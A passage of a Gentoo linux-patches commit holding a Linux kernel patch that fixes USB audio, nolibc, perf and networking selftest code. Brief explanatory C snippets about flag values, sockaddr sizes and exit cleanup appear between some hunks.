+ #include "common.h"
++#include "sdw.h"
+ 
+ #define DRIVER_NAME		"sm8250"
+ #define MI2S_BCLK_RATE		1536000
+diff --git a/sound/usb/implicit.c b/sound/usb/implicit.c
+index 41ac7185b42b6..4727043fd7458 100644
+--- a/sound/usb/implicit.c
++++ b/sound/usb/implicit.c
+@@ -471,7 +471,7 @@ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 	subs = find_matching_substream(chip, stream, target->sync_ep,
+ 				       target->fmt_type);
+ 	if (!subs)
+-		return sync_fmt;
++		goto end;
+ 
+ 	high_score = 0;
+ 	list_for_each_entry(fp, &subs->fmt_list, list) {
+@@ -485,6 +485,7 @@ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 		}
+ 	}
+ 
++ end:
+ 	if (fixed_rate)
+ 		*fixed_rate = snd_usb_pcm_has_fixed_rate(subs);
+ 	return sync_fmt;
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 99a66d0ef5b26..2c5765cbed2d6 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -160,9 +160,12 @@ find_substream_format(struct snd_usb_substream *subs,
+ bool snd_usb_pcm_has_fixed_rate(struct snd_usb_substream *subs)
+ {
+ 	const struct audioformat *fp;
+-	struct snd_usb_audio *chip = subs->stream->chip;
++	struct snd_usb_audio *chip;
+ 	int rate = -1;
+ 
++	if (!subs)
++		return false;
++	chip = subs->stream->chip;
+ 	if (!(chip->quirk_flags & QUIRK_FLAG_FIXED_RATE))
+ 		return false;
+ 	list_for_each_entry(fp, &subs->fmt_list, list) {
+@@ -525,6 +528,8 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 		if (snd_usb_endpoint_compatible(chip, subs->data_endpoint,
+ 						fmt, hw_params))
+ 			goto unlock;
++		if (stop_endpoints(subs, false))
++			sync_pending_stops(subs);
+ 		close_endpoints(chip, subs);
+ 	}
+ 
+@@ -935,8 +940,13 @@ get_sync_ep_from_substream(struct snd_usb_substream *subs)
+ 			continue;
+ 		/* for the implicit fb, check the sync ep as well */
+ 		ep = snd_usb_get_endpoint(chip, fp->sync_ep);
+-		if (ep && ep->cur_audiofmt)
+-			return ep;
++		if (ep && ep->cur_audiofmt) {
++			/* ditto, if the sync (data) ep is used by others,
++			 * this stream is restricted by the sync ep
++			 */
++			if (ep != subs->sync_endpoint || ep->opened > 1)
++				return ep;
++		}
+ 	}
+ 	return NULL;
+ }
+diff --git a/sound/usb/stream.c b/sound/usb/stream.c
+index f75601ca2d525..f10f4e6d3fb85 100644
+--- a/sound/usb/stream.c
++++ b/sound/usb/stream.c
+@@ -1222,6 +1222,12 @@ static int __snd_usb_parse_audio_interface(struct snd_usb_audio *chip,
+ 			if (err < 0)
+ 				return err;
+ 		}
++
++		/* try to set the interface... */
++		usb_set_interface(chip->dev, iface_no, 0);
++		snd_usb_init_pitch(chip, fp);
++		snd_usb_init_sample_rate(chip, fp, fp->rate_max);
++		usb_set_interface(chip->dev, iface_no, altno);
+ 	}
+ 	return 0;
+ }
+diff --git a/tools/include/nolibc/arch-mips.h b/tools/include/nolibc/arch-mips.h
+index 5fc5b8029bff9..7380093ba9e7d 100644
+--- a/tools/include/nolibc/arch-mips.h
++++ b/tools/include/nolibc/arch-mips.h
+@@ -192,6 +192,7 @@ struct sys_stat_struct {
+ __asm__ (".section .text\n"
+     ".weak __start\n"
+     ".set nomips16\n"
++    ".set push\n"
+     ".set    noreorder\n"
+     ".option pic0\n"
+     ".ent __start\n"
+@@ -210,6 +211,7 @@ __asm__ (".section .text\n"
+     "li $v0, 4001\n"              // NR_exit == 4001
+     "syscall\n"
+     ".end __start\n"
++    ".set pop\n"
+     "");
+ 
+ #endif // _NOLIBC_ARCH_MIPS_H
+diff --git a/tools/include/nolibc/arch-riscv.h b/tools/include/nolibc/arch-riscv.h
+index ba04771cb3a34..a3bdd9803f8cb 100644
+--- a/tools/include/nolibc/arch-riscv.h
++++ b/tools/include/nolibc/arch-riscv.h
+@@ -11,13 +11,13 @@
+ #define O_RDONLY            0
+ #define O_WRONLY            1
+ #define O_RDWR              2
+-#define O_CREAT         0x100
+-#define O_EXCL          0x200
+-#define O_NOCTTY        0x400
+-#define O_TRUNC        0x1000
+-#define O_APPEND       0x2000
+-#define O_NONBLOCK     0x4000
+-#define O_DIRECTORY  0x200000
++#define O_CREAT          0x40
++#define O_EXCL           0x80
++#define O_NOCTTY        0x100
++#define O_TRUNC         0x200
++#define O_APPEND        0x400
++#define O_NONBLOCK      0x800
++#define O_DIRECTORY   0x10000
+ 
+ struct sys_stat_struct {
+ 	unsigned long	st_dev;		/* Device.  */
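
The corrected nolibc values are the generic kernel fcntl constants, which are defined in octal (riscv uses the asm-generic set); e.g. O_CREAT is 0100 octal, i.e. 0x40. A quick octal-to-hex check of the values in the hunk:

/* Octal-to-hex mapping of the corrected O_* flags above. */
#include <stdio.h>

int main(void)
{
	printf("O_CREAT     0100    = %#x\n", 0100);     /* 0x40 */
	printf("O_EXCL      0200    = %#x\n", 0200);     /* 0x80 */
	printf("O_NOCTTY    0400    = %#x\n", 0400);     /* 0x100 */
	printf("O_TRUNC     01000   = %#x\n", 01000);    /* 0x200 */
	printf("O_APPEND    02000   = %#x\n", 02000);    /* 0x400 */
	printf("O_NONBLOCK  04000   = %#x\n", 04000);    /* 0x800 */
	printf("O_DIRECTORY 0200000 = %#x\n", 0200000);  /* 0x10000 */
	return 0;
}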
+diff --git a/tools/perf/builtin-kmem.c b/tools/perf/builtin-kmem.c
+index ebfab2ca17024..40dd52acc48ae 100644
+--- a/tools/perf/builtin-kmem.c
++++ b/tools/perf/builtin-kmem.c
+@@ -26,6 +26,7 @@
+ #include "util/string2.h"
+ 
+ #include <linux/kernel.h>
++#include <linux/numa.h>
+ #include <linux/rbtree.h>
+ #include <linux/string.h>
+ #include <linux/zalloc.h>
+@@ -184,22 +185,33 @@ static int evsel__process_alloc_event(struct evsel *evsel, struct perf_sample *s
+ 	total_allocated += bytes_alloc;
+ 
+ 	nr_allocs++;
+-	return 0;
+-}
+ 
+-static int evsel__process_alloc_node_event(struct evsel *evsel, struct perf_sample *sample)
+-{
+-	int ret = evsel__process_alloc_event(evsel, sample);
++	/*
++	 * Commit 11e9734bcb6a ("mm/slab_common: unify NUMA and UMA
++	 * version of tracepoints") adds the field "node" into the
++	 * tracepoints 'kmalloc' and 'kmem_cache_alloc'.
++	 *
++	 * The legacy tracepoints 'kmalloc_node' and 'kmem_cache_alloc_node'
++	 * also contain the field "node".
++	 *
++	 * If the tracepoint contains the field "node" the tool stats the
++	 * cross allocation.
++	 */
++	if (evsel__field(evsel, "node")) {
++		int node1, node2;
+ 
+-	if (!ret) {
+-		int node1 = cpu__get_node((struct perf_cpu){.cpu = sample->cpu}),
+-		    node2 = evsel__intval(evsel, sample, "node");
++		node1 = cpu__get_node((struct perf_cpu){.cpu = sample->cpu});
++		node2 = evsel__intval(evsel, sample, "node");
+ 
+-		if (node1 != node2)
++		/*
++		 * If the field "node" is NUMA_NO_NODE (-1), we don't take it
++		 * as a cross allocation.
++		 */
++		if ((node2 != NUMA_NO_NODE) && (node1 != node2))
+ 			nr_cross_allocs++;
+ 	}
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int ptr_cmp(void *, void *);
+@@ -1368,8 +1380,8 @@ static int __cmd_kmem(struct perf_session *session)
+ 		/* slab allocator */
+ 		{ "kmem:kmalloc",		evsel__process_alloc_event, },
+ 		{ "kmem:kmem_cache_alloc",	evsel__process_alloc_event, },
+-		{ "kmem:kmalloc_node",		evsel__process_alloc_node_event, },
+-		{ "kmem:kmem_cache_alloc_node", evsel__process_alloc_node_event, },
++		{ "kmem:kmalloc_node",		evsel__process_alloc_event, },
++		{ "kmem:kmem_cache_alloc_node", evsel__process_alloc_event, },
+ 		{ "kmem:kfree",			evsel__process_free_event, },
+ 		{ "kmem:kmem_cache_free",	evsel__process_free_event, },
+ 		/* page allocator */
+@@ -1823,6 +1835,19 @@ static int parse_line_opt(const struct option *opt __maybe_unused,
+ 	return 0;
+ }
+ 
++static bool slab_legacy_tp_is_exposed(void)
++{
++	/*
++	 * The tracepoints "kmem:kmalloc_node" and
++	 * "kmem:kmem_cache_alloc_node" have been removed on the latest
++	 * kernel, if the tracepoint "kmem:kmalloc_node" is existed it
++	 * means the tool is running on an old kernel, we need to
++	 * rollback to support these legacy tracepoints.
++	 */
++	return !IS_ERR(trace_event__tp_format("kmem", "kmalloc_node"));
++}
++
+ static int __cmd_record(int argc, const char **argv)
+ {
+ 	const char * const record_args[] = {
+@@ -1830,22 +1855,28 @@ static int __cmd_record(int argc, const char **argv)
+ 	};
+ 	const char * const slab_events[] = {
+ 	"-e", "kmem:kmalloc",
+-	"-e", "kmem:kmalloc_node",
+ 	"-e", "kmem:kfree",
+ 	"-e", "kmem:kmem_cache_alloc",
+-	"-e", "kmem:kmem_cache_alloc_node",
+ 	"-e", "kmem:kmem_cache_free",
+ 	};
++	const char * const slab_legacy_events[] = {
++	"-e", "kmem:kmalloc_node",
++	"-e", "kmem:kmem_cache_alloc_node",
++	};
+ 	const char * const page_events[] = {
+ 	"-e", "kmem:mm_page_alloc",
+ 	"-e", "kmem:mm_page_free",
+ 	};
+ 	unsigned int rec_argc, i, j;
+ 	const char **rec_argv;
++	unsigned int slab_legacy_tp_exposed = slab_legacy_tp_is_exposed();
+ 
+ 	rec_argc = ARRAY_SIZE(record_args) + argc - 1;
+-	if (kmem_slab)
++	if (kmem_slab) {
+ 		rec_argc += ARRAY_SIZE(slab_events);
++		if (slab_legacy_tp_exposed)
++			rec_argc += ARRAY_SIZE(slab_legacy_events);
++	}
+ 	if (kmem_page)
+ 		rec_argc += ARRAY_SIZE(page_events) + 1; /* for -g */
+ 
+@@ -1860,6 +1891,10 @@ static int __cmd_record(int argc, const char **argv)
+ 	if (kmem_slab) {
+ 		for (j = 0; j < ARRAY_SIZE(slab_events); j++, i++)
+ 			rec_argv[i] = strdup(slab_events[j]);
++		if (slab_legacy_tp_exposed) {
++			for (j = 0; j < ARRAY_SIZE(slab_legacy_events); j++, i++)
++				rec_argv[i] = strdup(slab_legacy_events[j]);
++		}
+ 	}
+ 	if (kmem_page) {
+ 		rec_argv[i++] = strdup("-g");
+diff --git a/tools/perf/builtin-trace.c b/tools/perf/builtin-trace.c
+index 3dcf6aed1ef71..97b17f8941dc0 100644
+--- a/tools/perf/builtin-trace.c
++++ b/tools/perf/builtin-trace.c
+@@ -17,7 +17,9 @@
+ #include "util/record.h"
+ #include <traceevent/event-parse.h>
+ #include <api/fs/tracing_path.h>
++#ifdef HAVE_LIBBPF_SUPPORT
+ #include <bpf/bpf.h>
++#endif
+ #include "util/bpf_map.h"
+ #include "util/rlimit.h"
+ #include "builtin.h"
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index 46ada5ec3f9a2..47062f459ccd6 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -2610,7 +2610,7 @@ static int find_dso_sym(struct dso *dso, const char *sym_name, u64 *start,
+ 				*size = sym->start - *start;
+ 			if (idx > 0) {
+ 				if (*size)
+-					return 1;
++					return 0;
+ 			} else if (dso_sym_match(sym, sym_name, &cnt, idx)) {
+ 				print_duplicate_syms(dso, sym_name);
+ 				return -EINVAL;
+diff --git a/tools/perf/util/bpf_counter.h b/tools/perf/util/bpf_counter.h
+index 4dbf26408b692..c6d21c07b14cd 100644
+--- a/tools/perf/util/bpf_counter.h
++++ b/tools/perf/util/bpf_counter.h
+@@ -4,9 +4,12 @@
+ 
+ #include <linux/list.h>
+ #include <sys/resource.h>
++
++#ifdef HAVE_LIBBPF_SUPPORT
+ #include <bpf/bpf.h>
+ #include <bpf/btf.h>
+ #include <bpf/libbpf.h>
++#endif
+ 
+ struct evsel;
+ struct target;
+@@ -87,6 +90,8 @@ static inline void set_max_rlimit(void)
+ 	setrlimit(RLIMIT_MEMLOCK, &rinf);
+ }
+ 
++#ifdef HAVE_BPF_SKEL
++
+ static inline __u32 bpf_link_get_id(int fd)
+ {
+ 	struct bpf_link_info link_info = { .id = 0, };
+@@ -127,5 +132,6 @@ static inline int bperf_trigger_reading(int prog_fd, int cpu)
+ 
+ 	return bpf_prog_test_run_opts(prog_fd, &opts);
+ }
++#endif /* HAVE_BPF_SKEL */
+ 
+ #endif /* __PERF_BPF_COUNTER_H */
+diff --git a/tools/testing/memblock/internal.h b/tools/testing/memblock/internal.h
+index fdb7f5db73082..85973e55489e7 100644
+--- a/tools/testing/memblock/internal.h
++++ b/tools/testing/memblock/internal.h
+@@ -15,6 +15,10 @@ bool mirrored_kernelcore = false;
+ 
+ struct page {};
+ 
++void __free_pages_core(struct page *page, unsigned int order)
++{
++}
++
+ void memblock_free_pages(struct page *page, unsigned long pfn,
+ 			 unsigned int order)
+ {
+diff --git a/tools/testing/selftests/net/af_unix/test_unix_oob.c b/tools/testing/selftests/net/af_unix/test_unix_oob.c
+index b57e91e1c3f28..532459a15067c 100644
+--- a/tools/testing/selftests/net/af_unix/test_unix_oob.c
++++ b/tools/testing/selftests/net/af_unix/test_unix_oob.c
+@@ -124,7 +124,7 @@ void producer(struct sockaddr_un *consumer_addr)
+ 
+ 	wait_for_signal(pipefd[0]);
+ 	if (connect(cfd, (struct sockaddr *)consumer_addr,
+-		     sizeof(struct sockaddr)) != 0) {
++		     sizeof(*consumer_addr)) != 0) {
+ 		perror("Connect failed");
+ 		kill(0, SIGTERM);
+ 		exit(1);
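
The selftest fix matters because struct sockaddr is only 16 bytes while struct sockaddr_un is much larger (about 110 bytes), so passing sizeof(struct sockaddr) to connect() truncates the AF_UNIX path. The sizes can be checked directly:

/* Compare the generic and AF_UNIX sockaddr sizes. */
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>

int main(void)
{
	printf("sizeof(struct sockaddr)    = %zu\n", sizeof(struct sockaddr));
	printf("sizeof(struct sockaddr_un) = %zu\n", sizeof(struct sockaddr_un));
	return 0;
}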
+diff --git a/tools/testing/selftests/net/l2_tos_ttl_inherit.sh b/tools/testing/selftests/net/l2_tos_ttl_inherit.sh
+index dca1e6f777a89..f11756e7df2f9 100755
+--- a/tools/testing/selftests/net/l2_tos_ttl_inherit.sh
++++ b/tools/testing/selftests/net/l2_tos_ttl_inherit.sh
+@@ -12,19 +12,27 @@
+ # In addition this script also checks if forcing a specific field in the
+ # outer header is working.
+ 
++# Return 4 by default (Kselftest SKIP code)
++ERR=4
++
+ if [ "$(id -u)" != "0" ]; then
+ 	echo "Please run as root."
+-	exit 0
++	exit $ERR
+ fi
+ if ! which tcpdump > /dev/null 2>&1; then
+ 	echo "No tcpdump found. Required for this test."
+-	exit 0
++	exit $ERR
+ fi
+ 
+ expected_tos="0x00"
+ expected_ttl="0"
+ failed=false
+ 
++readonly NS0=$(mktemp -u ns0-XXXXXXXX)
++readonly NS1=$(mktemp -u ns1-XXXXXXXX)
++
++RUN_NS0="ip netns exec ${NS0}"
++
+ get_random_tos() {
+ 	# Get a random hex tos value between 0x00 and 0xfc, a multiple of 4
+ 	echo "0x$(tr -dc '0-9a-f' < /dev/urandom | head -c 1)\
+@@ -61,7 +69,6 @@ setup() {
+ 	local vlan="$5"
+ 	local test_tos="0x00"
+ 	local test_ttl="0"
+-	local ns="ip netns exec testing"
+ 
+ 	# We don't want a test-tos of 0x00,
+ 	# because this is the value that we get when no tos is set.
+@@ -94,14 +101,15 @@ setup() {
+ 	printf "│%7s │%6s │%6s │%13s │%13s │%6s │" \
+ 	"$type" "$outer" "$inner" "$tos" "$ttl" "$vlan"
+ 
+-	# Create 'testing' netns, veth pair and connect main ns with testing ns
+-	ip netns add testing
+-	ip link add type veth
+-	ip link set veth1 netns testing
+-	ip link set veth0 up
+-	$ns ip link set veth1 up
+-	ip addr flush dev veth0
+-	$ns ip addr flush dev veth1
++	# Create netns NS0 and NS1 and connect them with a veth pair
++	ip netns add "${NS0}"
++	ip netns add "${NS1}"
++	ip link add name veth0 netns "${NS0}" type veth \
++		peer name veth1 netns "${NS1}"
++	ip -netns "${NS0}" link set dev veth0 up
++	ip -netns "${NS1}" link set dev veth1 up
++	ip -netns "${NS0}" address flush dev veth0
++	ip -netns "${NS1}" address flush dev veth1
+ 
+ 	local local_addr1=""
+ 	local local_addr2=""
+@@ -127,51 +135,59 @@ setup() {
+ 		if [ "$type" = "gre" ]; then
+ 			type="gretap"
+ 		fi
+-		ip addr add 198.18.0.1/24 dev veth0
+-		$ns ip addr add 198.18.0.2/24 dev veth1
+-		ip link add name tep0 type $type $local_addr1 remote \
+-		198.18.0.2 tos $test_tos ttl $test_ttl $vxlan $geneve
+-		$ns ip link add name tep1 type $type $local_addr2 remote \
+-		198.18.0.1 tos $test_tos ttl $test_ttl $vxlan $geneve
++		ip -netns "${NS0}" address add 198.18.0.1/24 dev veth0
++		ip -netns "${NS1}" address add 198.18.0.2/24 dev veth1
++		ip -netns "${NS0}" link add name tep0 type $type $local_addr1 \
++			remote 198.18.0.2 tos $test_tos ttl $test_ttl         \
++			$vxlan $geneve
++		ip -netns "${NS1}" link add name tep1 type $type $local_addr2 \
++			remote 198.18.0.1 tos $test_tos ttl $test_ttl         \
++			$vxlan $geneve
+ 	elif [ "$outer" = "6" ]; then
+ 		if [ "$type" = "gre" ]; then
+ 			type="ip6gretap"
+ 		fi
+-		ip addr add fdd1:ced0:5d88:3fce::1/64 dev veth0
+-		$ns ip addr add fdd1:ced0:5d88:3fce::2/64 dev veth1
+-		ip link add name tep0 type $type $local_addr1 \
+-		remote fdd1:ced0:5d88:3fce::2 tos $test_tos ttl $test_ttl \
+-		$vxlan $geneve
+-		$ns ip link add name tep1 type $type $local_addr2 \
+-		remote fdd1:ced0:5d88:3fce::1 tos $test_tos ttl $test_ttl \
+-		$vxlan $geneve
++		ip -netns "${NS0}" address add fdd1:ced0:5d88:3fce::1/64 \
++			dev veth0 nodad
++		ip -netns "${NS1}" address add fdd1:ced0:5d88:3fce::2/64 \
++			dev veth1 nodad
++		ip -netns "${NS0}" link add name tep0 type $type $local_addr1 \
++			remote fdd1:ced0:5d88:3fce::2 tos $test_tos           \
++			ttl $test_ttl $vxlan $geneve
++		ip -netns "${NS1}" link add name tep1 type $type $local_addr2 \
++			remote fdd1:ced0:5d88:3fce::1 tos $test_tos           \
++			ttl $test_ttl $vxlan $geneve
+ 	fi
+ 
+ 	# Bring L2-tunnel link up and create VLAN on top
+-	ip link set tep0 up
+-	$ns ip link set tep1 up
+-	ip addr flush dev tep0
+-	$ns ip addr flush dev tep1
++	ip -netns "${NS0}" link set tep0 up
++	ip -netns "${NS1}" link set tep1 up
++	ip -netns "${NS0}" address flush dev tep0
++	ip -netns "${NS1}" address flush dev tep1
+ 	local parent
+ 	if $vlan; then
+ 		parent="vlan99-"
+-		ip link add link tep0 name ${parent}0 type vlan id 99
+-		$ns ip link add link tep1 name ${parent}1 type vlan id 99
+-		ip link set ${parent}0 up
+-		$ns ip link set ${parent}1 up
+-		ip addr flush dev ${parent}0
+-		$ns ip addr flush dev ${parent}1
++		ip -netns "${NS0}" link add link tep0 name ${parent}0 \
++			type vlan id 99
++		ip -netns "${NS1}" link add link tep1 name ${parent}1 \
++			type vlan id 99
++		ip -netns "${NS0}" link set dev ${parent}0 up
++		ip -netns "${NS1}" link set dev ${parent}1 up
++		ip -netns "${NS0}" address flush dev ${parent}0
++		ip -netns "${NS1}" address flush dev ${parent}1
+ 	else
+ 		parent="tep"
+ 	fi
+ 
+ 	# Assign inner IPv4/IPv6 addresses
+ 	if [ "$inner" = "4" ] || [ "$inner" = "other" ]; then
+-		ip addr add 198.19.0.1/24 brd + dev ${parent}0
+-		$ns ip addr add 198.19.0.2/24 brd + dev ${parent}1
++		ip -netns "${NS0}" address add 198.19.0.1/24 brd + dev ${parent}0
++		ip -netns "${NS1}" address add 198.19.0.2/24 brd + dev ${parent}1
+ 	elif [ "$inner" = "6" ]; then
+-		ip addr add fdd4:96cf:4eae:443b::1/64 dev ${parent}0
+-		$ns ip addr add fdd4:96cf:4eae:443b::2/64 dev ${parent}1
++		ip -netns "${NS0}" address add fdd4:96cf:4eae:443b::1/64 \
++			dev ${parent}0 nodad
++		ip -netns "${NS1}" address add fdd4:96cf:4eae:443b::2/64 \
++			dev ${parent}1 nodad
+ 	fi
+ }
+ 
+@@ -192,10 +208,10 @@ verify() {
+ 		ping_dst="198.19.0.3" # Generates ARPs which are not IPv4/IPv6
+ 	fi
+ 	if [ "$tos_ttl" = "inherit" ]; then
+-		ping -i 0.1 $ping_dst -Q "$expected_tos" -t "$expected_ttl" \
+-		2>/dev/null 1>&2 & ping_pid="$!"
++		${RUN_NS0} ping -i 0.1 $ping_dst -Q "$expected_tos"          \
++			 -t "$expected_ttl" 2>/dev/null 1>&2 & ping_pid="$!"
+ 	else
+-		ping -i 0.1 $ping_dst 2>/dev/null 1>&2 & ping_pid="$!"
++		${RUN_NS0} ping -i 0.1 $ping_dst 2>/dev/null 1>&2 & ping_pid="$!"
+ 	fi
+ 	local tunnel_type_offset tunnel_type_proto req_proto_offset req_offset
+ 	if [ "$type" = "gre" ]; then
+@@ -216,10 +232,12 @@ verify() {
+ 				req_proto_offset="$((req_proto_offset + 4))"
+ 				req_offset="$((req_offset + 4))"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip[$req_proto_offset] = 0x01 and \
+-			ip[$req_offset] = 0x08 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip[$req_proto_offset] = 0x01 and              \
++				ip[$req_offset] = 0x08 2>/dev/null            \
++				| head -n 1)"
+ 		elif [ "$inner" = "6" ]; then
+ 			req_proto_offset="44"
+ 			req_offset="78"
+@@ -231,10 +249,12 @@ verify() {
+ 				req_proto_offset="$((req_proto_offset + 4))"
+ 				req_offset="$((req_offset + 4))"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip[$req_proto_offset] = 0x3a and \
+-			ip[$req_offset] = 0x80 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip[$req_proto_offset] = 0x3a and              \
++				ip[$req_offset] = 0x80 2>/dev/null            \
++				| head -n 1)"
+ 		elif [ "$inner" = "other" ]; then
+ 			req_proto_offset="36"
+ 			req_offset="45"
+@@ -250,11 +270,13 @@ verify() {
+ 				expected_tos="0x00"
+ 				expected_ttl="64"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip[$req_proto_offset] = 0x08 and \
+-			ip[$((req_proto_offset + 1))] = 0x06 and \
+-			ip[$req_offset] = 0x01 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip[$req_proto_offset] = 0x08 and              \
++				ip[$((req_proto_offset + 1))] = 0x06 and      \
++				ip[$req_offset] = 0x01 2>/dev/null            \
++				| head -n 1)"
+ 		fi
+ 	elif [ "$outer" = "6" ]; then
+ 		if [ "$type" = "gre" ]; then
+@@ -273,10 +295,12 @@ verify() {
+ 				req_proto_offset="$((req_proto_offset + 4))"
+ 				req_offset="$((req_offset + 4))"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip6[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip6[$req_proto_offset] = 0x01 and \
+-			ip6[$req_offset] = 0x08 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip6[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip6[$req_proto_offset] = 0x01 and             \
++				ip6[$req_offset] = 0x08 2>/dev/null           \
++				| head -n 1)"
+ 		elif [ "$inner" = "6" ]; then
+ 			local req_proto_offset="72"
+ 			local req_offset="106"
+@@ -288,10 +312,12 @@ verify() {
+ 				req_proto_offset="$((req_proto_offset + 4))"
+ 				req_offset="$((req_offset + 4))"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip6[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip6[$req_proto_offset] = 0x3a and \
+-			ip6[$req_offset] = 0x80 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip6[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip6[$req_proto_offset] = 0x3a and             \
++				ip6[$req_offset] = 0x80 2>/dev/null           \
++				| head -n 1)"
+ 		elif [ "$inner" = "other" ]; then
+ 			local req_proto_offset="64"
+ 			local req_offset="73"
+@@ -307,15 +333,17 @@ verify() {
+ 				expected_tos="0x00"
+ 				expected_ttl="64"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip6[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip6[$req_proto_offset] = 0x08 and \
+-			ip6[$((req_proto_offset + 1))] = 0x06 and \
+-			ip6[$req_offset] = 0x01 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip6[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip6[$req_proto_offset] = 0x08 and             \
++				ip6[$((req_proto_offset + 1))] = 0x06 and     \
++				ip6[$req_offset] = 0x01 2>/dev/null           \
++				| head -n 1)"
+ 		fi
+ 	fi
+ 	kill -9 $ping_pid
+-	wait $ping_pid 2>/dev/null
++	wait $ping_pid 2>/dev/null || true
+ 	result="FAIL"
+ 	if [ "$outer" = "4" ]; then
+ 		captured_ttl="$(get_field "ttl" "$out")"
+@@ -351,11 +379,35 @@ verify() {
+ }
+ 
+ cleanup() {
+-	ip link del veth0 2>/dev/null
+-	ip netns del testing 2>/dev/null
+-	ip link del tep0 2>/dev/null
++	ip netns del "${NS0}" 2>/dev/null
++	ip netns del "${NS1}" 2>/dev/null
+ }
+ 
++exit_handler() {
++	# Don't exit immediately if one of the intermediate commands fails.
++	# We might be called at the end of the script, when the network
++	# namespaces have already been deleted. So cleanup() may fail, but we
++	# still need to run until 'exit $ERR' or the script won't return the
++	# correct error code.
++	set +e
++
++	cleanup
++
++	exit $ERR
++}
++
++# Restore the default SIGINT handler (just in case) and exit.
++# The exit handler will take care of cleaning everything up.
++interrupted() {
++	trap - INT
++
++	exit $ERR
++}
++
++set -e
++trap exit_handler EXIT
++trap interrupted INT
++
+ printf "┌────────┬───────┬───────┬──────────────┬"
+ printf "──────────────┬───────┬────────┐\n"
+ for type in gre vxlan geneve; do
+@@ -385,6 +437,10 @@ done
+ printf "└────────┴───────┴───────┴──────────────┴"
+ printf "──────────────┴───────┴────────┘\n"
+ 
++# All tests done.
++# Set ERR appropriately: it will be returned by the exit handler.
+ if $failed; then
+-	exit 1
++	ERR=1
++else
++	ERR=0
+ fi
+diff --git a/tools/testing/selftests/netfilter/nft_trans_stress.sh b/tools/testing/selftests/netfilter/nft_trans_stress.sh
+index a7f62ad4f6611..2ffba45a78bf4 100755
+--- a/tools/testing/selftests/netfilter/nft_trans_stress.sh
++++ b/tools/testing/selftests/netfilter/nft_trans_stress.sh
+@@ -10,12 +10,20 @@
+ ksft_skip=4
+ 
+ testns=testns-$(mktemp -u "XXXXXXXX")
++tmp=""
+ 
+ tables="foo bar baz quux"
+ global_ret=0
+ eret=0
+ lret=0
+ 
++cleanup() {
++	ip netns pids "$testns" | xargs kill 2>/dev/null
++	ip netns del "$testns"
++
++	rm -f "$tmp"
++}
++
+ check_result()
+ {
+ 	local r=$1
+@@ -43,6 +51,7 @@ if [ $? -ne 0 ];then
+ 	exit $ksft_skip
+ fi
+ 
++trap cleanup EXIT
+ tmp=$(mktemp)
+ 
+ for table in $tables; do
+@@ -139,11 +148,4 @@ done
+ 
+ check_result $lret "add/delete with nftrace enabled"
+ 
+-pkill -9 ping
+-
+-wait
+-
+-rm -f "$tmp"
+-ip netns del "$testns"
+-
+ exit $global_ret
+diff --git a/tools/testing/selftests/netfilter/settings b/tools/testing/selftests/netfilter/settings
+new file mode 100644
+index 0000000000000..6091b45d226ba
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/settings
+@@ -0,0 +1 @@
++timeout=120


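The trap-based cleanup added to tos_ttl_inherit.sh above follows one pattern: run under "set -e", let a single EXIT handler do the teardown, and make that handler tolerate failures so the script still returns the recorded status. The same idea, sketched in C with atexit() instead of a shell trap; the names cleanup and g_err are illustrative, not from the patch:

  #include <stdio.h>
  #include <stdlib.h>

  static int g_err = 1;	/* pessimistic default, like ERR */

  static void cleanup(void)
  {
  	/* Runs on every exit path, so it must tolerate partially
  	 * torn-down state; the script's exit_handler does the same
  	 * by switching to "set +e" before cleaning up. */
  	fprintf(stderr, "cleanup, exiting with %d\n", g_err);
  }

  int main(void)
  {
  	atexit(cleanup);	/* analogous to: trap exit_handler EXIT */
  	/* ... run the tests, bailing out early on failure ... */
  	g_err = 0;		/* every test passed */
  	return g_err;		/* cleanup() still runs; status survives */
  }
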
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
